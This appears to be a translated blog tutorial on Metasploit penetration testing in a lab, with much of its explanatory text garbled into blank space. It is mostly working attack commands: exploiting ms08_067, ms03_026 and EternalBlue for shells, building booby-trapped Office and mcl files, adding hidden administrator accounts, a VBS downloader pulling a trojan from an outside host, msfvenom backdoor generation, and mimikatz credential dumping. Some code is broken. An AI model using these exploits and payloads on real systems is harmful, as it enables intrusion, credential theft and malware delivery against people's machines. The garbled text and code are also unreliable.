Metaslloit浸透

16210 ワード

この記事では、よくある脆弱性の使用について説明します.
1.脆弱性の利用
1.1 ms08_067(CVE-2008-4250)侵入WinXP-SP 3
  ping   ;     
    1     
    LHOST(   ): Win7-  Metasploit  
    RHOST(   ): WinXP-SP3-           
    2     
    2.1      ,                 ,   Ping  .
    (1)  xp      .
    (2)         IP.
cmd-> ipconfig
    (3)      ,   PING 
cmd-> ping   ip
    (4)     Metasploit  
    (5)     
     
    2.2    
    (1)  metasploit
  msfconsole.bat,         .
    (2)          
msf  > search ms08_067

    (3)  ms08_067_netapi    
msf  > use exploit/windows/smb/ms08_067_netapi
    (4)         
msf exploit(ms08_067_netapi)  > show payloads
    (5)      
msf exploit(ms08_067_netapi)  > set payload windows/meterpreter/reverse_tcp
    (6)         
msf exploit(ms08_067_netapi)  >show options
    (7)         
msf exploit(ms08_067_netapi)  >set LHOST 192.168.1.89
msf exploit(ms08_067_netapi)  >set RHOST 192.168.1.235
msf exploit(ms08_067_netapi)  >show options
    (8)    
msf exploit(ms08_067_netapi)  >exploit
2.3     calc
meterpreter > execute -f calc.exe

1.2 ms 03_の利用026(CVE-2003-0352)WinXP-SP 1侵入
    1     
    LHOST(   ): Win7-  Metasploit  
    RHOST(   ): WinXP-SP1-           
    2     
    2.1      (  )
    2.2    
    (1)  metasploit

    (2)          
msf  > search ms03_026
    (3)  ms03_026_dcom    
msf  > use exploit/windows/dcerpc/ms03_026_dcom
    (4)         
msf exploit(ms03_026_dcom)  > show payloads
    (5)      
msf exploit(ms03_026_dcom)  > set payload windows/meterpreter/bind_tcp
    (6)         
msf exploit(ms03_026_dcom)  >show options

    (7)         
msf exploit(ms03_026_dcom)  >set LHOST 192.168.1.89
msf exploit(ms03_026_dcom)  >set RHOST 192.168.1.228
msf exploit(ms03_026_dcom)  >show options
    (8)    
msf exploit(ms03_026_dcom)  >exploit
    (9)    
meterpreter >ps
      exeplorer   ID
meterpreter > migrate 1388

    2.3     calc
    meterpreter > execute -f calc.exe

1.3利用ms 17_010(CVE-2017-0143)侵入Win 7
    1     
    LHOST(   ): Win7-  Metasploit  
    RHOST(   ): Win7 -           
    2     
    2.1      (  )
    2.2    
    (1)  metasploit
    (2)          
msf  > search ms17_010
    (3)  windows/smb/ms17_010_eternalblue    
msf  > use exploit/windows/smb/ms17_010_eternalblue
    (4)         
msf exploit(ms17_010_eternalblue)  > show payloads
    (5)      
msf exploit(ms17_010_eternalblue)  > set payload generic/shell_reverse_tcp
    (6)         
msf exploit(ms17_010_eternalblue)  >show options
    (7)         
msf exploit(ms17_010_eternalblue)  >set LHOST 192.168.1.217
msf exploit(ms17_010_eternalblue)  >set RHOST 192.168.1.205
msf exploit(ms17_010_eternalblue)  >show options
    (8)    
msf exploit(ms17_010_eternalblue)  >exploit

1.4 ms 12-027(CVE-2012-0158)による利用可能文書の生成
    1     
    LHOST(   ): Win7-  metasploit  
    RHOST(   ): Win7 /XPSP3 (Office 2007)
    2     
    (1)  metasploit
    (2)          
msf  > search ms12_027
    (3)  windows/fileformat/ms12_027_mscomctl_bof    
msf  > use windows/fileformat/ms12_027_mscomctl_bof
    (4)         
msf exploit(windows/fileformat/ms12_027_mscomctl_bof)  > show payloads
    (5)      
msf exploit(windows/fileformat/ms12_027_mscomctl_bof)  > set payload  windows/exec
    (6)         
msf exploit(windows/fileformat/ms12_027_mscomctl_bof)  >show options
    (7)         
msf exploit(windows/fileformat/ms12_027_mscomctl_bof)  >set cmd calc.exe
msf exploit(windows/fileformat/ms12_027_mscomctl_bof)  >set EXITFUNC thread
msf exploit(windows/fileformat/ms12_027_mscomctl_bof)  >show options
    (8)    
msf exploit(windows/fileformat/ms12_027_mscomctl_bof)  >exploit

    2.2  calc.exe
                 calc.exe

1.5 cve-2017-11882による利用可能文書の生成
cve-2017-11882.py—github
    1     
    LHOST(   ): Win7-  python2.7  
    RHOST(   ): Win7-x64(Office 2007/2010)
    2     
    2.1     test.doc  
    pyhton2 Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
    2.2  calc.exe
           test      calc.exe

1.6 Office-DE利用
CVE-2017-11826–github
# -*- coding: utf-8 -*-
from docx import Document
from docx.oxml import parse_xml
from docx.oxml.ns import nsdecls
import argparse
'''
         pip3 install python-docx
'''

document = Document()
paragraph = document.add_paragraph()
p = paragraph._p
fld_xml = ''
fld_xml = fld_xml % nsdecls('w')
fldSimple = parse_xml(fld_xml)
p.addnext(fldSimple)
document.save('cve_2017_11826.docx')

-----------------------------------------
             
python CVE-2017-11826.py

1.7 CVE-2015-2509マルチメディアファイルmcl
#!/usr/bin/python
# Title: MS15-100 Windows Media Center Command Execution
# Date : 11/09/2015
# Author: R-73eN
# Software: Windows Media Center
# Tested : Windows 7 Ultimate
# CVE : 2015-2509

print('begin to construct the file...')
command = "calc.exe"
evil = 'command + '"/>'
f = open("CVE_2015_2509_Music.mcl","w")
f.write(evil)
f.close()
print("
[+] Music.mcl generated . . . [+]"
) ----------------------------------------- python CVE-2015-2509.py

1.8 windows環境利用ms 08-067
Ms 08-067脆弱性鶏を捕まえる方法利用ツール
(1) x-scan  :    Ms08-067         .

(2)           net use \\192.168.1.101\ipc$
(3)Ms08-067.exe 192.168.1.101 -->   SMB connect ok! Sendpayloadover!
(4)    : telnet 192.168.48.148 4444
(5)               (   )

         :      net user
         :      net user ahoo 123456 /add
         :      net user ahoo /add
          : net localgroup administrators ahoo /add

    -5.1      :
                    3389,  mstsc /admin  .


(6)          ----        (powershell)-- tasklist >c:\1.txt .     vbs     .

                 ,            :
        echo iLocal=Lcase(wscript.arguments(1))>wenpeng.vbe
        echo iremote=Lcase(wscript.arguments(0))>>wenpeng.vbe
        echo setxpost=createobject(“microsoft.xmlhttp”)>>wenpeng.vbe
        echo xpost.open“Get”,iremote,0>>wenpeng.vbe
        echo xpost.send()>>wenpeng.vbe
        echo set sget=Createobject(“adodb.stream”)>>wenpeng.vbe
        echo sget.mode=3>>wenpeng.vbe
        echo sget.type=1>>wenpeng.vbe
        echo sget.open()>>wenpeng.vbe
        echo sget.write(xpost.responsebody)>>wenpeng.vbe
        echo sget.savetofileilocal,2>>wenpeng.vbe

                 1 wenpeng.vbe   .
         web  (git).
            :
    wcscript wenpeng.vbe http://www.show33.com:88/muma.exe wenpeng.exe

2.Msf学習
2.1 Meterpreter機能
(1)     
    meterpreter > webcam_scream     ;       .
(2)      
    meterpreter > run post/windows/manage/enable_rdp 
    2.                 ,         ,   xxx.
     :        run getgui -u admin -p passw0rd       RDP  ,              。      ,     。
(3)    
    meterpreter > load mimikatz     ;  mimikatz  
    meterpreter > wdigest           ;    wdigest    
(4)    
    root@kali:~# > rdesktop 192.168.48.148 -u Administrator -p 123456
(5)upload  
             ,       setup.exe      system32   
    upload  setup.exe  C:\\windows\\system32\
(6)download  
                        
      :     C      boot.ini          /root/   
    download C:\\boot.ini /root/            ;         ,     .

2.2木馬を利用してshellを取得する(上は抜け穴を利用して、これから木馬を使って、教務管理システムの文章を参考する).
(1)    (   screenshot   ):
    msf > msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.48.143 LPORT=4444 -f exe > ahoo.exe

(2)          .
     ahoo.exe       (kali[192.168.48.143]   ,WinXPenSP3[192.168.48.148],WindowsXPProfessional[192.168.48.136],Windows7_x86_ahoo[]192.168.48.149)
(3) Metasploit    :
    msf > use exploit/multi/handler
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    msf exploit(handler) > show options
    msf exploit(handler) > set LHOST 192.168.48.143
    msf exploit(handler) > exploit              ;           .

(4)  ,         ,   【    (     ahoo.exe)】:
    meterpreter > use sniffer
    meterpreter > help
    meterpreter > sniffer_interfaces        ;                
    meterpreter > sniffer_start 1           ;   1   
(5)       
    meterpreter > sniffer_stop 1            ;    
    meterpreter > sniffer_dump 1 localfile  ;      
    meterpreter > shutdown                  ;  
(6)wireshark      :
    root@kali:~# wireshark ahoo.pcap

2.3 Nmapスキャン
利用ms 08_067_Netapの前に私たちは彼がこの抜け穴を持っていることを知らなかった.私たちはnmapを使ってスキャンする必要がある.
root@kali:~# nmap --script=vuln 192.168.48.148
        Host script results:
        smb-vuln-cve2009-3103.
        smb-vuln-ms08-067:
        smb-vuln-ms10-054:false
        smb-vuln-ms10-061:ERROR:Script execution failed (use -d to debug)

root@kali:~# nmap --script=auth 192.168.48.148

cmd    : netstat -an
    TCP 192.168.48.148:1234     192.168.48.143:4444     CLOSE_WAIT

nmap 192.168.1.141 -p139,445 --script=smb-os-discovery.nse  #    smb     

2.4 Nessusスキャン
自分で使っていますが、インストールの過程はやはりネット文を参考にしましょう.
3 Reference
[0]大学霸Kali Linux安全浸透教程
[1] I Want to Use Metasploit on Windows
[2]windows版-metasploit-framework-4.17.0+20180824145152.git.4.ddb 11 aa-1 rapid 7-1-x 86.msi
[3]Nessus脆弱性スキャンチュートリアルのインストールNessusツール
[4]msfvenomによる木馬プログラムの生成
[5]msfvenomは各種Payloadコマンドを生成する
[6]Msfvenomアホ化バックドア生成ツール
[7]msfpayloadを使用してshellcodeを生成する
[8]Shellcodeジェネレータ-msfvenom
[9][XDCTF]Shellcode DIY
[10]Conficker/Kido ShellCode
[11]C++逆接続バックドアを実現
[12]シングルチャネルバックドアコード
[13]機能meterpreterセッション浸透利用によく用いられる32個のコマンド
[14]METASPLOIT基礎入門